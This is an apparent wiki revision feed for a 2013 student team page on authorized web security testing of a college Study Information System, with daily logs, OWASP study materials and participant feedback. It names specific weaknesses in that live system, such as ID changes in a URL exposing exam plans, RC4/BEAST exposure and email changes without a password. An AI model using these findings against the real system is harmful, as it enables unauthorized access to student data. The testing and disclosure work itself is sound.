** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.&lt;br /&gt;
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
&lt;br /&gt;
I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in teams.&lt;br /&gt;
** Meeting new people.&lt;br /&gt;
** Seeing new places.&lt;br /&gt;
** Learning new things.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
** Brainstorming after whole day of lectures.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62408</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62408"/>
		<updated>2013-04-05T08:35:50Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Feedback from Jurij Lukjančikov */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
